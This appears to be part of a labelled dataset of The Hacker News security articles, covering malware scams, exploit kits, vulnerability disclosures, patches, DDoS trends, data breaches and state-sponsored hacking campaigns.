Samsung was the first one to bring 4GB RAM access in the Android mobile phones with the launch of Galaxy S6 and Galaxy S6 Edge, and now…
…the company has again taken a step further with the launch of 12GB LPDDR4 (low power, double data rate 4) DRAM Chip to offer 6GB RAM for its Next Generation Smartphones and tablets.
The next generation mobile devices are supposed to be equipped with new mobile DRAM chip to enable increased capacity and fastest speed; simultaneously providing essentials including:
Excellent energy efficiency
Reliability
Smooth multitasking
Ease of design
Better performance with the compatible operating system
For more information – Read more.
6. Russian Hackers Hijack Satellite To Steal Data from Thousands of Hacked Computers
Turla APT (Advanced Persistent Threat), a group of Russian hackers, is hijacking commercial satellites to hide its command-and-control operations.
Turla is a sophisticated Russian cyber-espionage group, believed to be sponsored by the Russian government, with a number of high-profile targets including:
government
military
embassy
research,
and pharmaceutical organizations...
...from over 45 countries, such as China, Vietnam, and the United States.
The group is now taking advantage of the fact that older satellites orbiting around the Earth do not come with support for encrypted connections and rely on unsuspecting users of the satellite Internet service providers across the world. – Read more.
7. How to Remove KeyRaider Malware that Hacked Over 225,000 iOS Devices
At the end of last month, security researchers discovered an iPhone malware, dubbed ""KeyRaider,"" that stole more than 225,000 credentials from jailbroken Apple devices.
KeyRaider, as the malware raids victims' username and passwords, private keys, and certificates, is spreading via the popular Cydia app repositories and is capable of performing:
Ransomware Attacks
Data Theft
DDoS Attacks
However, jailbreak users may implement some measures to mitigate the risk of KeyRaider malware.
Here's Steps to Remove KeyRaider Malware – Read More.
8. Warning! Seagate Wireless Hard Drives Have a Secret Backdoor for Hackers
Yes, you heard right. Security researchers uncovered an undocumented Telnet services with a hard-coded password in Seagate Wireless Hard Drives.
The researchers found a vulnerability (CVE-2015-2874) with an inbuilt user account (default username and password — ""root"") that could have allowed an attacker to access the device remotely, leaving users' data vulnerable to theft.
Affected devices include:
Seagate Wireless Plus Mobile Storage
Seagate Wireless Mobile Storage (Wirelessly streaming your tablet and smartphone's data)
LaCie FUEL (Wirelessly extending storage for iPads)
Fortunately, there's an easy fix. For patch and more information – Read more.
9. China Police Arrest 15,000 Suspects for Alleged Cyber Crimes
As part of its six-month long operation dubbed ""Cleaning the Internet,"" China Police arrested nearly 15,000 people on suspicion of cyber crimes last month.
Besides the arrest of around 15,000 suspects, Police also suspended more than 190,000 illegal online websites featuring vulgar contents including advertisements for pornography, firearms, explosives, and gambling. – Read More.
10. Android Stagefright Exploit Code Released
Zimperium team finally released the CVE-2015-1538 Stagefright Exploit to the public, demonstrating the process of Remote Code Execution (RCE).
The Stagefright vulnerability allows a hacker to reveal victim's information by injecting malicious code remotely, even without any involvements of the victim.
The purpose of the public release of the exploit code is to put penetration testers and security researchers to test and check the code and analyze the results.
11. Ashley Madison's Parent Company Secretly Running Online Escort Services
Avid Life Media, the company that owns Ashley Madison, was secretly running an Online Escort Service, leaked documents revealed last week.
An internal memo leaked by the Ashley Madison hackers revealed that Avid Life was running an Escorts.ca website that was similar to other online escort services.
Besides running Escorts.ca, Avid Life Media was actively recruiting escorts for another website it owned, called ""Arrangement Finders"" – ""sugar daddy"" website with tagline is ""Intimacy with a Twi$t."" – Read more.
12. URRGH! Evil app Watches YOU WATCHING PORN and takes your snaps
Watching Porn? Maybe the porn app you have installed on your Android smartphone could be taking your snaps to blackmail you for money.
Security researchers has uncovered an Android pornography application called Adult Player that promises free pornographic videos, but actually is taking your photographs to extort you for $500 (£330) ransom – a whole new way of Cyber Extortion.
For detailed information and know how to get rid of this Android Ransomware app – Read more.
13. Contactless Fingerprint Scanner Captures Your Prints from Meters Away
We all are aware of Fingerprint Biometric Readers that requires our touch to authenticate our identity to be authorized.
However, the latest research conducted by the National Institute of Standards and Technology (NIST) indicates that the future of fingerprint scanners lies in a ""no-touch"" activity by an individual for gaining authorization.
The Contactless Fingerprint Scanners, dubbed 'fast-capture non-contact' devices as NIST calls it, is capable of sensing and reading your fingerprint information while you are standing few meters away from the scanner.
For more in-depth information – Read more.
14. Microsoft Releases 12 Security Updates
In this month's Tuesday Patch Update, Microsoft addressed a total of 56 vulnerabilities in its different products. The updates included five critical, out of which two of them addressed vulnerabilities in all versions of Windows.
For detailed information on each and every update and their security patches – Read more.
15. How to Track Stolen Devices using Mac Addresses
An Iowa police officer David Schwindt has developed a sniffing software, dubbed L8NT (short for Latent analysis of 802.11 Network Traffic), that helps police find more stolen properties.
L8NT is a specialized wireless dongle with an antenna that scans for and locates MAC addresses associated with the known stolen devices.
For detailed information on working of L8NT – Read more.
",Malware
Beware of New Celebrity Sex Tape (Scam) Leaked on Facebook!,https://thehackernews.com/2016/12/facebook-scam-malware.html,"If you came across a celebrity sex video on Facebook featuring Jessica Alba or any other celebrity, just avoid clicking it.
Another Facebook scam is circulating across the social networking website that attempts to trick Facebook users into clicking on a link for a celebrity sex tape that instead downloads malware onto their computers.
Once installed, the malware would force web browsers to display aggressive advertising web pages which include sites with nudity and fake lotteries.
The spam campaign was uncovered by researchers at Cyren, who noted that a malicious Google Chrome extension is spreading nude celebrity PDFs through private messages and posts on various Facebook groups.
If opened, the PDF file takes victims to a web page with an image containing a play button, tricking users that the PDF may contain a video.
Once clicked, the link redirects users of Internet Explorer, Firefox, or Safari to a web page with overly-aggressive popups and advertisements related to nudity and fake lottery.
But on the other hand, this celebrity sex tape scam makes the matter worse for Google Chrome users.
The Scam is Fatal for Google Chrome Users
Once clicked on the scam link, Chrome desktop users are redirected to a fake YouTube page that leads up a pop-up window inviting victims to install a Google Chrome extension to view the videos.
Once victims get to install the malicious extension, the browser directs users to the Facebook.com login page and prompt them to re-authenticate, allowing attackers to collect Facebook users' credentials and then use their accounts to spread the malicious campaign further.
When analyzed the Chrome extension's source code, the Cyren team discovered that the extension comes with support for monitoring and intercepting web traffic in real-time, to determine what users can access through their browsers.
The malicious Chrome extension contains a long list of Antivirus and AntiSpam domains that it blocks and prevents the user from opening.
Besides this, the malicious Chrome extension also prevents victims from accessing the Chrome Extensions settings page, so that victims can not disable the malicious add-on.
""It also blocks the chrome extensions and chrome devtools tabs from being opened, preventing the user from uninstalling the malicious Chrome extension,"" the researchers say.
The PDF uploaded to Facebook is generated by selecting the name of a celebrity randomly from the script file and combining the selected name with random characters.
The name of celebrities includes Selena Gomez, Jessica Alba, Jennifer Lawrence, Hilary Duff, Paris Hilton, Rihanna, Kim Kardashian, Scarlett Johansson, Kelly Brook, Doutzen Kroes, Elodie Varlet and Nicki Minaj.
According to Cyren researchers, the cyber criminals behind this malicious spam campaign managed to upload their extension to the Chrome Web Store, though the extension has since been removed by the Google's security team.
How to remove the Malicious Chrome Extension?
To remove this malicious extension, the infected users would first have to delete the Registry key from the Registry Editor.
To do this, Go to Start Button → Type ""regedit"" in the Search/Run option, which will open the Windows Registry Editor.
Now, use the side menu in the new window to find the folder below, right-click it and select ""Remove.""
This is the path to the Registry Editor:
HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extension
Now the second step is to remove the extension from the browser. Since the malicious Chrome extension prevents victims from accessing the native Chrome Extensions settings page, one must remove the extension by deleting the following folder from one's PC.
C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions
This action will remove all Chrome extensions from your computer. You have no option other than deleting the folder completely to get rid of the malicious threat, as you can not access the Chrome Extensions settings page to get the ID of the malicious extension.
Last but not the least, no celebrity recently have had their sex tape leaked (at least not one that's available online). So if you come across any link claiming to show a leaked sex tape of Jessica Alba, Jennifer Lawrence or any other, remember just to report it.
",Malware
SolarWinds Hack — New Evidence Suggests Potential Links to Chinese Hackers,https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html,"A malicious web shell deployed on Windows systems by leveraging a previously undisclosed zero-day in SolarWinds' Orion network monitoring software may have been the work of a possible Chinese threat group.
In a report published by Secureworks on Monday, the cybersecurity firm attributed the intrusions to a threat actor it calls Spiral.
Back on December 22, 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems.
The findings were also corroborated by cybersecurity firms Palo Alto Networks' Unit 42 threat intelligence team and GuidePoint Security, both of whom described Supernova as a .NET web shell implemented by modifying an ""app_web_logoimagehandler.ashx.b6031896.dll"" module of the SolarWinds Orion application.
The alterations were made possible not by breaching the SolarWinds app update infrastructure but instead by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn allowing a remote attacker to execute unauthenticated API commands.
""Unlike Solorigate [aka Sunburst], this malicious DLL does not have a digital signature, which suggests that this may be unrelated to the supply chain compromise,"" Microsoft had noted.
While the Sunburst campaign has since been formally linked to Russia, the origins of Supernova remained a mystery until now.
According to Secureworks Counter Threat Unit (CTU) researchers — who discovered the malware in November 2020 while responding to a hack in one of its customers' networks — ""the immediate and targeted nature of the lateral movement suggests that Spiral had prior knowledge of the network.""
During the course of further investigation, the firm said it found similarities between the incident and that of a prior intrusion activity on the same network uncovered in August 2020, which had been accomplished by exploiting a vulnerability in a product known as ManageEngine ServiceDesk as early as 2018.
""CTU researchers were initially unable to attribute the August activity to any known threat groups,"" the researchers said. ""However, the following similarities to the Spiral intrusion in late 2020 suggest that the Spiral threat group was responsible for both intrusions.""
The connection to China stems from the fact that attacks targeting ManageEngine servers have long been associated with threat groups located in the country, not to mention the modus operandi of exploiting long-term persistence to collect credentials, exfiltrate sensitive data, and plunder intellectual property.
But more solid evidence arrived in the form of an IP address that geolocated to China, which the researchers said came from a host that was used by the attackers to run Secureworks's endpoint detection and response (EDR) software for reasons best known to the threat actor, suggesting the software may have been stolen from the compromised customer.
""The threat group likely downloaded the endpoint agent installer from the network and executed it on the attacker-managed infrastructure,"" the researchers detailed. ""The exposure of the IP address was likely unintentional, so its geolocation supports the hypothesis that the Spiral threat group operates out of China.""
It's worth pointing out that SolarWinds addressed Supernova in an update to Orion Platform released on December 23, 2020.
",Cyber_Attack
Phoenix Exploit's Kit 2.8 mini version,https://thehackernews.com/2011/10/phoenix-exploits-kit-28-mini-version.html,"Phoenix Exploit's Kit 2.8 mini version
Back in April of this year, we reported the leak of Phoenix Exploit Kit 2.5. The version currently in circulation is 2.8, and despite its lower activity for the last half of this year, it remains one of the preferred exploit packs used by cyber-criminals.
In comparison to the Black Hole Exploit Pack, the PEK has a similar licensing model. The last version released offered an ""alternative"" to purchasing the exploit pack. This ""alternative"" is the Phoenix Exploit's Kit 2.8 mini.
The current licensing model consists of the following:
· Simple Domain (Closed) – USD $2,200.00
· Multithreaded Domain (Closed) – USD $2,700.00
· Extra-Encryption Service (ReFUDing) – USD $40.00
The mini version does not change the characteristics of the Exploit Pack, at least in regards to its graphical interface and functionality in relation to previous versions. Each section has the same type of display and statistical information, which is provided in a minimalistic yet concise manner. Although trivial, this is one of the main reasons for the adoption of Phoenix by cyber-criminals. The ability to easily locate information and merge the functionality of this Exploit Pack with a Malware Kit, such as SpyEye or ZeuS, increases their level of success and attack strategies.
The main difference between the full version and the mini version is that the mini version is subject to a domain under the simple mode, while the full version allows multitasking.
There isn't much new about the Exploit Pack. The code has been optimized to increase the success rate of exploitation and the exploit for Java Runtime Environment to Trusted has been added.
Also removed were the following exploits pre-compiled in version 2.7:
· Windows Help and Support Center Protocol Handler Vulnerability – CVE-2010-1885
· Integer overflow in the AVM2 abcFile parser in Adobe Flash Player – CVE-2009-1869
· Integer overflow in Adobe Flash Player 9 – CVE-2007-0071
· IEPeers Remote Code Execution – CVE-2009-0806
· Internet Explorer Recursive CSS Import Vulnerability – CVE-2010-3971
Although it's basically the same exploits (similar in all cases, including those incorporating other Exploit Packs in the wild), the author's optimized for each version. In this case, it includes the following exploits:
· Microsoft Data Access Components (MDAC) - CVE-2006-0003
· Adobe Reader Javascript Printf Buffer Overflow - CVE-2008-2992
· Adobe Reader LibTiff - CVE-2010-0188
· Adobe Reader Collab GetIcon - CVE-2009-0927
· Java SMB - CVE-2010-0746
· Java Runtime Environment Trusted - CVE-2010-0840
· Java Skyline Plug-in component in Oracle Java SE and Java for Business 6 - CVE-2010-3552
· Java Deployment Toolkit Component - CVE-2010-0886
Despite the optimization of the components for each version, it is interesting that chain optimization and updating MDAC exploits remains the most prevalent, not only in this Exploit Pack but in any of the existing Exploit Packs. What is the reason? It comes down to a lack of experience by the users (application, customers around the basic procedures update) that transforms them into a potential target and highly susceptible through this old, but effective vulnerability.
[Source]
",Vulnerability
Adobe Releases First 2020 Patch Tuesday Software Updates,https://thehackernews.com/2020/01/adobe-software-updates.html,"Adobe today released software updates to patch a total of 9 new security vulnerabilities in two of its widely used applications, Adobe Experience Manager and Adobe Illustrator.
It's the first Patch Tuesday for the year 2020 and one of the lightest patch releases in a long time for Adobe users.
Moreover, none of the security vulnerabilities patched this month were either publicly disclosed or found being actively exploited in the wild.
5 of the 9 security vulnerabilities are 'critical' in severity, and all of them affect Adobe Illustrator CC versions 24.0 and earlier, which were reported to the company by Fortinet's FortiGuard Labs researcher Honggang Ren.
According to an advisory published by Adobe, all five critical issues in Adobe Illustrator software are memory corruption bugs that could allow an attacker to execute arbitrary code on targeted systems in the context of the current user.
The rest 4 security vulnerabilities affect Adobe Experience Manager—a comprehensive content management solution for building websites, mobile apps, and forms—none of which are critical in severity but should be patched at your earliest convenience.
That's also because Adobe has marked security updates for Adobe Experience Manager with a priority rating of 2, which means similar flaws have previously been seen exploited in the wild, but for now, the company has found no evidence of any exploitation of these vulnerabilities in the wild.
These reported issues—which include: reflected cross-site scripting, user interface injection, and expression language injection—affect multiple versions of Adobe Experience Manager, all leading to sensitive information disclosure, where three of them are important in severity and one moderate.
Adobe today released Illustrator CC 2019 version 24.0.2 for Windows operating system and patches for Adobe Experience Manager versions 6.3, 6.4, and 6.5.
Adobe recommends end-users and administrators to install the latest security updates as soon as possible to protect their systems and businesses from potential cyber-attacks.
",Vulnerability
How to Build a Successful Incident Response Plan,https://thehackernews.com/2015/11/how-to-incident-response-plan.html,"The fight to protect your company's data isn't for the faint of heart.
As an embattled IT warrior, with more systems, apps, and users to support than ever before, keeping everything up and running is a battle in itself.
When it comes to preventing the worst-case scenario from happening, you need all the help you can get, despite your super-hero status.
According to SANS, there are 6 key phases of an incident response plan.
Preparation - Preparing users and IT to handle potential incidents in case they happen
Identification - Figuring out what we mean by a ""security incident"" (which events can we ignore vs. which we must act on right now?)
Containment - Isolating affected systems to prevent further damage
Eradication - Finding and eliminating the root cause (removing affected systems from production)
Recovery - Permitting affected systems back into the production environment (and watching them closely)
Lessons Learned - Writing everything down and reviewing and analyzing with all team members so you can improve future incident response efforts
Here are three examples from the front lines of incident response that can help you at each phase as you build out your plan.
On Defining Success Incident Response Success
There are many levels of success in defensive work… the common wisdom is that the attacker only has to be right once, but the defender has to be right every time, but that's not always true.
Attacks are not all-or-nothing affairs - they happen over time, with multiple stages before final success.
To remain undetected against an attentive defender, it is the attacker who must make every move correctly; if an astute defender detects them even once, they have the possibility to locate and stop the whole attack.
You aren't going to immediately detect everything that happens during an attack - but as long as you detect (and correctly identify) enough of an attack to stop it in its tracks, that's success.
Don't Panic. Stay Focused.
Execution is key - the range of ways to attack a target can seem limitless - expecting to be an expert on all of them is pointlessly unrealistic.
The most important part of incident response is to handle every situation in a way that limits damage, and reduces recovery time and costs.
At the end of the day, that's how you'll be measured on a job well done… not that you've covered every angle of every potential vulnerability.
Start with Simple Steps. Attackers are Lazy.
Attackers have technical and economic imperatives to use the minimum amount of effort and resources to breach their targets - the more you remove the low-hanging fruit on your network, the more you raise the actual level of work an attacker has to expend to successfully infiltrate it.
AlienVault has recently created a 5 chapter eBook titled the Insider's Guide to Incident Response that goes further into fundamental strategies that can help you create an efficient and effective incident response plan.
The eBook covers:
Arming & Aiming Your Incident Response Team
Incident Response Process and Procedures
Types of Security Incidents
Incident Response Tools
Incident Response Training
You can download the entire eBook at AlienVault's website here.
Learn more about AlienVault USM:
Download a free 30-day trial
Watch a demo on-demand
Play with USM in our product sandbox (no download required)
",Cyber_Attack
WordPress plugin W3 Total Cache critical Vulnerability disclosed,https://thehackernews.com/2012/12/wordpress-plugin-w3-total-cache_26.html,"One of the most popular Wordpress Plugin called ""W3 Total Cache"" which is used to Improve site performance and user experience via caching, having potential vulnerability. On Christmas day, someone disclose it on full-disclosure site that how a plugin misconfiguration leads to possible Wordpress cms hack.
The loophole is actually activated on the fact that how W3TC stores the database cache. Jason disclosed that cache data is stored in public accessible directory, from where a malicious attack can can retrieve password hashes and other database information.
Default location where this plugin stores data is ""/wp-content/w3tc/dbcache/"" and if directory listing is enabled, attacker can browse and download it.
He said,""Even with directory listings off, cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable.""
Because the plugin is very famous ,so this makes quite easy for hackers to play with WordPress blogs. Author also publish a simple shell script to identify and exploit this bug.
We would like to recommend webmasters to either upgrade the plugin to new version or deny access to plugin directory by making an extra .htccess in that folder.
Update 29-Dec-2012 : WordPress plugin W3 Total Cache updated to version 0.9.2.5 with fix for above vulnerability.
Change Log : Fixed security issue that can occur if using database caching to disk. If using database caching to disk with a web server with directory listing or web accessible wp-content/w3tc/dbcache/* directories. This patch works for all hosting environments / types where PHP is properly configured, i.e. .htaccess modifications (or other web server configuration changes) are *not* necessary to ensure proper security. Empty the database cache after performing the update if you use database caching to disk.
Download W3 Total Cache Plugin for Wordpress
",Vulnerability
Adult Friend Finder... Hacked & 3.5 Million Users' Database Leaked Online,https://thehackernews.com/2015/05/adult-friend-finder.html,"Until now, hackers have targeted companies and websites that hold your credit card details or medical information, but now they are showing interest in your sex life instead.
You heard it right. Adult Friend Finder, a casual dating website with the tagline ""hookup, find sex or meet someone hot now"", has suffered a massive data breach.
Nearly 4 Million users of AdultFriendFinder have had their personal details, including email addresses, usernames, dates of birth, postcodes and IP addresses, exposed on the dark web for sale online.
The Channel 4 news site broke the story on Thursday and warned users of the California-based dating site with 64 million members who want to have sex and one night stands with strangers.
Nearly 4 Million Sex Life Exposed!!!
The leaked data also includes the information on whether the users are gay or straight and even which ones might be seeking extramarital affairs. This data could be goldmines for hacker trying to blackmail people to extort money, and Channel 4 says this may already be happening.
Shaun Harper is one of those members whose details were made public, even after he already had deleted his account. This clearly indicates that AdultFriendFinder do not get rid of data after customers leave.
So far, no hacking group or individual has claimed responsibility for the hack, but this data breach is embarrassing for those who had their sex life exposed in just one shot.
Now, let's have a look at what AdultFriendFinder parent company FriendFinder Networks has to say on its part?
FriendFinder Networks confirmed that there has been a data breach at AdultFriendFinder, but would not specify how many customers have been affected by the hack and to what extent.
Here's a statement by FriendFinder Networks offered to Channel 4 News:
""FriendFinder Networks Inc understands and fully appreciates the seriousness of the issue. We have already begun working closely with law enforcement and have launched a comprehensive investigation with the help of leading third-party forensics expert. We pledge to take the appropriate steps needed to protect our customers if they are affected.""
According to Channel 4, the leaked data has come from a hacker nicknamed ROR[RG] who posted the details of users of Adult FriendFinder to an online forum. It appears that the hacker attempted to blackmail the users to extort $100,000 before publishing the data online.
",Data_Breaches
Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform — Patch ASAP!,https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html,"Application security company F5 Networks on Wednesday published an advisory warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks.
The patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), two of which were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020.
The four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues.
Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a DoS attack.
Urging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague said the ""vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program.""
The vulnerabilities have been addressed in the following products:
BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3
BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2
Besides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues.
The fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution.
The latest update to BIG-IP software arrives less than a year after the company addressed a similar critical flaw (CVE-2020-5902) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a ""broad scanning activity for the presence of this vulnerability across federal departments and agencies.""
""This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices,"" said Matt ""Pwn all the Things"" Tait in a tweet.
",Vulnerability
Reflection DDoS Attacks Using Millions of UPnP Devices on the Rise,https://thehackernews.com/2014/10/reflection-ddos-attacks-using-millions_16.html,"After successful in launching reflection and amplification Distributed Denial-of-Service (DDoS) attacks by abusing various protocols such as DNS, NTP and SMTP, hackers are now abusing Simple Service Discovery Protocol (SSDP) – part of the UPnP protocol standard – to target home and office devices, researchers warned.
SSDP is a network protocol based on the Internet Protocol Suite that comes enabled on millions of networked devices, such as computers, printers, Internet gateways, Router / Wi-Fi access points, mobile devices, webcams, smart TVs and gaming consoles, to discover each other and automatically establish working configurations that enable data sharing, media streaming, media playback control and other services.
FLAW IN UPnP USED IN AMPLIFICATION DDoS ATTACK
Prolexic Security Engineering & Response Team (PLXsert) at Akamai Technologies have issued a warning that the devices use in residential or small office environments are being co-opted into reflection and amplification distributed denial-of-service (DDoS) attacks since July that abuse communications protocols enabled on UPnP devices.
""The rise of reflection attacks involving UPnP devices in an example of how fluid and dynamic the DDoS crime ecosystem can be in identifying, developing and incorporating new resources and attack vectors into its arsenal,"" the advisory states. ""Further development and refinement of attack payloads and tools is likely in the near future.""
The weakness in the Universal Plug-and-Play (UPnP) standard could allow an attacker to compromise millions of its consumer and business devices, which could be conscripted by them to launch an effective DDoS attack on a target.
Attackers have found that Simple Object Access Protocol (SOAP) – protocol used to exchange sensitive information in a decentralized, distributed environment – requests ""can be crafted to elicit a response that reflects and amplifies a packet, which can be redirected towards a target.""
This UPnP attack is useful for both reflection attacks, given the number of vulnerable devices, and amplification as researchers estimate that it can magnify attack traffic by a factor of 30, according to the advisory.
OVER 4.1 MILLIONS DEVICES VULNERABLE
According to the security researchers, about 38 percent of the 11 million Internet-facing UPnP devices, i.e. over 4.1 million devices, in use are potentially vulnerable to being used in this type of reflection DDoS attack.
""The number of UPnP devices that will behave as open reflectors is vast, and many of them are home-based Internet-enabled devices that are difficult to patch,"" said Akamai security business unit senior vice president and general manager Stuart Scholly. ""Action from firmware, application and hardware vendors must occur in order to mitigate and manage this threat.""
MAJOR TARGETED COUNTRIES
South Korea has the largest number of vulnerable devices, followed by the United States, Canada, and China, according to the advisory.
This isn't the first time when a security flaw in UPnP has allowed attackers to target home and business devices, back in January 2013, a flaw in UPnP exposed more than 50 millions computers, printers and storage drives to attack by hackers remotely.
",Vulnerability
Your Linux Can Get Hacked Just by Opening a File in Vim or Neovim Editor,https://thehackernews.com/2019/06/linux-vim-vulnerability.html,"Linux users, beware!
If you haven't recently updated your Linux operating system, especially the command-line text editor utility, do not even try to view the content of a file using Vim or Neovim.
Security researcher Armin Razmjou recently discovered a high-severity arbitrary OS command execution vulnerability (CVE-2019-12735) in Vim and Neovim—two most popular and powerful command-line text editing applications that come pre-installed with most Linux-based operating systems.
On Linux systems, Vim editor allows users to create, view or edit any file, including text, programming scripts, and documents.
Since Neovim is just an extended forked version of Vim, with better user experience, plugins and GUIs, the code execution vulnerability also resides in it.
Code Execution Flaw in Vim and Neovim
Razmjou discovered a flaw in the way Vim editor handles ""modelines,"" a feature that's enabled-by-default to automatically find and apply a set of custom preferences mentioned by the creator of a file near the starting and ending lines in the document.
Though the editor only allows a subset of options in modelines (for security reasons) and uses sandbox protection if it contains an unsafe expression, Razmjou revealed that using "":source!"" command (with a bang [!] modifier) can be used to bypass the sandbox.
Therefore, just opening an innocent looking specially crafted file using Vim or Neovim could allow attackers to secretly execute commands on your Linux system and take remote control over it.
The researcher has also released two proof-of-concept exploits to the public, one of which demonstrates a real-life attack scenario wherein a remote attacker gains access to a reverse shell from the victim's system as soon as he/she opens a file on it.
The maintainers of Vim (patch 8.1.1365) and Neovim (released in v0.3.6) have released updates for both utilities to address the issue, which users should install as soon as possible.
Besides this, the researcher has also recommended users to:
disable modelines feature,
disable ""modelineexpr"" to disallow expressions in modelines,
use ""securemodelines plugin,"" a secure alternative to Vim modelines.
",Vulnerability
Chinese Hackers Targeted India's Power Grid Amid Geopolitical Tensions,https://thehackernews.com/2021/03/chinese-hackers-targeted-indias-power.html,"Amid heightened border tensions between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups.
The attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector.
""10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure,"" Recorded Future said in a report published yesterday. ""Other targets identified included 2 Indian seaports.""
Chief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.
Pinning the intrusions on a new group dubbed ""RedEcho,"" investigators from the cybersecurity firm's Insikt Group said the malware deployed by the threat actor shares strong infrastructure and victimology overlaps with other Chinese groups APT41 (aka Barium, Winnti, or Wicked Panda) and Tonto Team.
Border conflicts have flared up since last year after deadly clashes between Indian and Chinese soldiers in Ladakh's Galwan Valley. While 20 Indian soldiers were killed in the clashes, China formally identified four casualties on its side for the first time on February 19.
In the intervening months, the Indian government has banned over 200 Chinese apps for allegedly engaging in activities that posed threats to ""national security and defence of India, which ultimately impinges upon the sovereignty and integrity of India.""
Noting that the standoff between the two countries was accompanied by increased espionage activity on both sides, Recorded Future said the attacks from China involved the use of infrastructure it tracks as AXIOMATICASYMPTOTE, which encompasses a modular Windows backdoor called ShadowPad that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.
Additionally, the report also raises questions about a possible connection between the skirmishes and a power blackout that crippled Mumbai last October.
While initial probe conducted by the cyber department of the western Indian state of Maharashtra traced the attack to malware identified at a Padgha-based State Load Despatch Centre, the researchers said, ""the alleged link between the outage and the discovery of the unspecified malware variant remains unsubstantiated.""
""However, this disclosure provides additional evidence suggesting the coordinated targeting of Indian Load Despatch Centres,"" they added.
Interestingly, these cyberattacks were described as originating from Chengdu, which is also the base for a network technology firm called Chengdu 404 Network Technology Company that operated as a front for a decade-long hacking spree targeting more than 100 high-tech and online gaming companies.
But it's not just China. In the weeks leading to the clashes in May, a state-sponsored group called Sidewinder — which operates in support of Indian political interests — is said to have singled out Chinese military and government entities in a spear-phishing attack using lures related to COVID-19 or the territorial disputes between Nepal, Pakistan, India, and China.
The modus operandi aside, the finding is yet another reminder of why critical infrastructure continues to be a lucrative target for an adversary looking to cut off access to essential services used by millions of people.
""The intrusions overlap with previous Indian energy sector targeting by Chinese threat activity groups in 2020 that also used AXIOMATICASYMPTOTE infrastructure,"" the researchers concluded. ""Therefore, the focus in targeting India's electricity system possibly indicates a sustained strategic intent to access India's energy infrastructure.""
We have reached out to India's Computer Emergency Response Team (CERT-IN), and we will update the story if we hear back.
UPDATE
A major power blackout that struck Mumbai last October may have been the result of a deliberate act of cyber sabotage, according to a preliminary report released by Maharashtra Cyber Cell said on Wednesday, adding it found possible evidence of 14 ""Trojan horses"" and 8GB of unexplained data deployed in the city's power system. In a statement to Reuters, China denied responsibility for carrying out the attack.
",Cyber_Attack
Chinese Hackers Carried Out Country-Level Watering Hole Attack,https://thehackernews.com/2018/06/chinese-watering-hole-attack.html,"Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks.
The campaign is believed to be active covertly since fall 2017 but was spotted in March by security researchers from Kaspersky Labs, who have attributed these attacks to a Chinese-speaking threat actor group called LuckyMouse.
LuckyMouse, also known as Iron Tiger, EmissaryPanda, APT 27 and Threat Group-3390, is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year.
The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors.
This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain ""access to a wide range of government resources at one fell swoop.""
According to the researchers, the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks.
Although LuckyMouse has been spotted using a widely used Microsoft Office vulnerability (CVE-2017-11882) to weaponize Office documents in the past, researchers have no proofs of this technique being used in this particular attack against the data center.
The initial attack vector used in the attack against the data center is unclear, but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center.
The attack against the data center eventually infected the targeted system with a piece of malware called HyperBro, a Remote Access Trojan (RAT) deployed to maintain persistence in the targeted system and for remote administration.
""There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites,"" the researchers said in a blog post published today.
""These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.""
As a result of the waterholing attack, the compromised government websites redirected the country's visitors to either penetration testing suite Browser Exploitation Framework (BeEF) that focuses on the web browser, or the ScanBox reconnaissance framework, which perform the same tasks as a keylogger.
The main command and control (C&C) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP, specifically to a MikroTik router running a firmware version released in March 2016.
Researchers believe the Mikrotik router was explicitly hacked for the campaign in order to process the HyperBro malware's HTTP requests without detection.
",Cyber_Attack
